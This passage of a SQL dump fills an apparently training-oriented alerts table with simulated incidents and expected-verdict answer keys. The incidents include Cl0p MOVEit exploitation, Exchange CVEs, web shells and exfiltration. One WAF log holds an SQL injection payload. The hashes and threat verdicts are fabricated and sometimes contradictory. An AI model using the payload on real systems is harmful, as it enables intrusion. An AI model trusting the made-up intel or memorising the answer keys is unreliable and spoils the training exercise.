'Persistence: Backdoor Creation Alert', 'high', 'System Event Logs', 'To ensure continued access, a sophisticated backdoor is deployed, blending into normal traffic and evading basic security measures.', 'Backdoor', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T15:23:43Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"filename\":\"svchost.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_description\":\"New service installed for persistence.\",\"service_name\":\"WinSvcHelper\",\"service_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"}', '2026-01-08 22:09:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account used in suspicious logon activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Malicious file mimicking a legitimate Windows process.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (589, 'Lateral Movement: Unauthorized Access Detected', 'high', 'Network Traffic Analysis', 'Attackers are attempting to expand their foothold by moving laterally within the network, targeting sensitive data stores and critical systems. Unauthorized access was detected from an external IP to multiple internal systems.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:12:34Z\",\"event_id\":\"LM-20231005-001\",\"source_ip\":\"203.0.113.45\",\"destination_ips\":[\"10.0.5.25\",\"192.168.1.14\"],\"username\":\"jdoe_admin\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_action\":\"User jdoe_admin accessed multiple systems within a short time frame\",\"file_accessed\":\"confidential_financial_data.xlsx\",\"alert\":\"Suspicious lateral movement detected from external IP 203.0.113.45 using compromised credentials.\"}', '2026-01-08 22:09:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Local network IP, no suspicious activity recorded.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Local network IP, no suspicious activity recorded.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in abnormal access patterns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for credential theft.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL), (590, 'Exfiltration: Data Transfer Anomaly', 'critical', 'Data Loss Prevention (DLP) Systems', 'Anomalous data transfer activities are detected, indicating potential exfiltration of sensitive information to external servers controlled by the attackers. The data transfer volume and destination IPs suggest a sophisticated exfiltration attempt.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"DLP-20231015142345-001\",\"source_ip\":\"10.0.0.5\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"financial_report_q3_2023.xlsx\",\"hash\":\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\",\"data_volume\":\"2GB\",\"protocol\":\"HTTPS\",\"action_taken\":\"Alerted\",\"description\":\"Detected large data transfer to external IP not whitelisted.\"}', '2026-01-08 22:09:13', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration endpoint associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Employee: John Doe, Sales Department.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive financial information.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Hashing Database\",\"verdict\":\"suspicious\",\"details\":\"File hash not recognized in the internal database.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (591, 'Initial Access via SQL Injection', 'high', 'Web application firewall logs', 'Cl0p identifies and exploits an SQL injection vulnerability in the MOVEit platform, allowing unauthorized access to sensitive databases.', 'Exploitation of Vulnerability', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"WAF123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"method\":\"GET\",\"url\":\"https://moveit.example.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"request_payload\":\"username=admin\' OR 1=1-- &password=dummy\",\"response_code\":200,\"signature_id\":\"SQLi-2023-001\",\"description\":\"SQL Injection attempt detected\"}', '2026-01-08 22:12:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous SQL injection attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal MOVEit server.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://moveit.example.com/login\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Web Application\",\"verdict\":\"clean\",\"details\":\"Legitimate web application URL.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (592, 'Automated Execution of Data Harvesting Scripts', 'high', 'Endpoint detection and response (EDR) tools', 'Following initial access, Cl0p group deployed automated JavaScript scripts on the compromised MOVEit infrastructure to systematically extract large volumes of sensitive data.', 'T1059.007: Command and Scripting Interpreter: JavaScript', 'T1059.007', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"compromised-host\",\"detected_script\":\"/var/tmp/data_harvest.js\",\"hash\":\"ec2f4a6b3e8fbc4a9d1f2c3d4e5f6a7b8c9d0e1f\",\"attacker_ip\":\"203.0.113.66\",\"user\":\"john_doe\",\"process_id\":4567,\"command_line\":\"node /var/tmp/data_harvest.js\",\"execution_time\":\"2023-10-05T14:23:30Z\"}', '2026-01-08 22:12:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"ec2f4a6b3e8fbc4a9d1f2c3d4e5f6a7b8c9d0e1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with Cl0p activities\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.66\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account used in suspicious script execution\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"/var/tmp/data_harvest.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as part of data exfiltration operation\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (593, 'Establishing Persistence within Networks', 'high', 'System startup and logon logs', 'Cl0p group has established persistence by modifying the system logon scripts to execute malicious binaries during system startup. This action ensures continued access for prolonged data theft.', 'T1547: Boot or Logon Autostart Execution', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:23Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host\",\"logon_type\":\"2\",\"source_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"logon_process\":\"User32\",\"file_path\":\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"User logon with modified startup script executing malware.\"}', '2026-01-08 22:12:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligenceDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File recognized as a Cl0p group persistence mechanism.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User account compromised by adversary.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (594, 'Lateral Movement to Enhance Data Access', 'high', 'Network traffic analysis', 'Suspicious lateral movement detected within the organization network indicating potential attempt to enhance data access by hiding indicators on host systems.', 'T1070: Indicator Removal on Host', 'T1070', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:18Z\",\"event_id\":\"4634\",\"source_ip\":\"203.0.113.56\",\"destination_ip\":\"192.168.1.45\",\"destination_host\":\"file-server-02\",\"malware_hash\":\"3f4d5c6e7b8e9f0a123456789abcdef0\",\"user\":\"admin_user\",\"filename\":\"cl0p_removal_tool.exe\",\"action\":\"Indicator removal\",\"log_message\":\"Possible use of Cl0p malware detected. Unusual indicator removal activity from 203.0.113.56 targeting 192.168.1.45 by user admin_user using cl0p_removal_tool.exe.\"}', '2026-01-08 22:12:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Cl0p APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset\",\"verdict\":\"internal\",\"details\":\"Internal file server targeted by the threat.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f4d5c6e7b8e9f0a123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"cl0p_removal_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Cl0p malware activities.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (595, 'Mass Exfiltration and Unique Extortion', 'high', 'Outbound network traffic logs', 'In the final act, Cl0p exfiltrates data to external servers and initiates a unique extortion campaign, threatening public release rather than deploying ransomware. The operation involved transferring large volumes of data to a known malicious IP associated with Cl0p\'s command and control infrastructure.', 'T1041: Exfiltration Over C2 Channel', 'Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:17Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"185.225.19.78\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"bytes_out\":987654321,\"username\":\"jdoe\",\"filename\":\"financial_data_backup.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"ALLOW\"}', '2026-01-08 22:12:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.225.19.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Cl0p C2 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_data_backup.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"File matches internal naming conventions for sensitive data backups.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (596, 'Suspicious Access to Exchange Server', 'high', 'Exchange Server logs', 'Initial access attempt detected on the Exchange server via CVE-2021-34473 exploitation. An unauthorized request was made from a suspicious external IP address, potentially setting the stage for further attacks.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:03:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.10.5\",\"destination_port\":\"443\",\"username\":\"unauthorized_user\",\"action\":\"login_attempt\",\"status\":\"failed\",\"exploit\":\"CVE-2021-34473\",\"file_accessed\":\"/owa/auth.owa\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\"}', '2026-01-08 22:15:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT groups targeting Exchange servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Exchange Server\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in the directory.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/owa/auth.owa\",\"is_critical\":true,\"osint_result\":{\"source\":\"Security Logs\",\"verdict\":\"suspicious\",\"details\":\"File frequently targeted in Exchange exploits.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (597, 'Web Shell Deployment Detected', 'high', 'Web server logs', 'A web shell has been deployed on the server, allowing remote execution of commands by attackers. This indicates a severe security breach that needs immediate attention.', 'Execution', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"method\":\"POST\",\"url\":\"/uploads/webshell.php\",\"http_status\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uploaded_file\":{\"filename\":\"webshell.php\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"username\":\"admin_user\",\"session_id\":\"abcd1234efgh5678ijkl\"}', '2026-01-08 22:15:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal web server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"webshell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Incident Response Team\",\"verdict\":\"malicious\",\"details\":\"File identified as web shell\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"MD5 hash associated with known web shells\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Admin account used for unauthorized access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (598, 'Privilege Escalation via CVE-2021-34523', 'high', 'Event logs and security logs', 'An attacker exploited CVE-2021-34523 to escalate privileges on the server, potentially allowing persistent access. The attacker used a crafted exploit to gain elevated privileges, moving from a standard user account to an administrative account. This action solidifies their foothold within the network, facilitating further malicious activities.', 'Persistence', 'T1068: Exploitation for Privilege Escalation', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_id\":4624,\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"event_type\":\"Logon\",\"user\":{\"target_user\":\"admin_user\",\"target_domain\":\"CORP\",\"target_logon_id\":\"0x3e7\"},\"logon_type\":2,\"logon_process\":\"User32 \",\"authentication_package\":\"Negotiate\",\"source_ip\":\"203.0.113.45\",\"source_port\":60000,\"target_ip\":\"10.0.0.25\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"vulnerability_exploited\":\"CVE-2021-34523\"}', '2026-01-08 22:15:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"suspicious\",\"details\":\"Hash observed in suspicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"clean\",\"details\":\"Legitimate administrative user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (599, 'Lateral Movement Detected in Network', 'high', 'Network traffic analysis', 'The attackers are moving laterally through the network, using compromised credentials and exploiting trust relationships to access additional systems.', 'Lateral Movement', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"LM-0456\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.50\",\"attacker_ip\":\"203.0.113.45\",\"compromised_user\":\"jdoe\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"network.exe\",\"protocol\":\"HTTP\",\"action\":\"Successful Login\",\"description\":\"User jdoe from IP 192.168.1.25 accessed 192.168.1.50 using compromised credentials. Network traffic analysis reveals communication with external IP 203.0.113.45 and transfer of suspicious file network.exe with hash 5d41402abc4b2a76b9719d911017c592.\"}', '2026-01-08 22:15:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Common internal IP used by workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP of target workstation within internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in unauthorized access attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used for lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"network.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File identified as malware used for spreading within the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL), (600, 'Data Exfiltration via Unusual Channels', 'high', 'Data loss prevention logs', 'Sensitive data was exfiltrated using encrypted channels, indicating a potential ransom demand or further exploitation. The data was sent to an external IP known for malicious activities. The file \'customer_data_backup.zip\' was detected leaving the network from an internal host using unusual ports.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:24:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.54\",\"protocol\":\"HTTPS\",\"port\":443,\"filename\":\"customer_data_backup.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"event\":\"data_exfiltration_attempt\",\"encryption\":\"TLS\",\"alert_id\":\"EXFIL-12345\"}', '2026-01-08 22:15:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host used for data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data theft.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"customer_data_backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention System\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (601, 'Brute Force Attack Detected on Corporate Server', 'high', 'Splunk', 'Multiple failed login attempts detected from a suspicious foreign IP address targeting the corporate server. This indicates a possible brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, 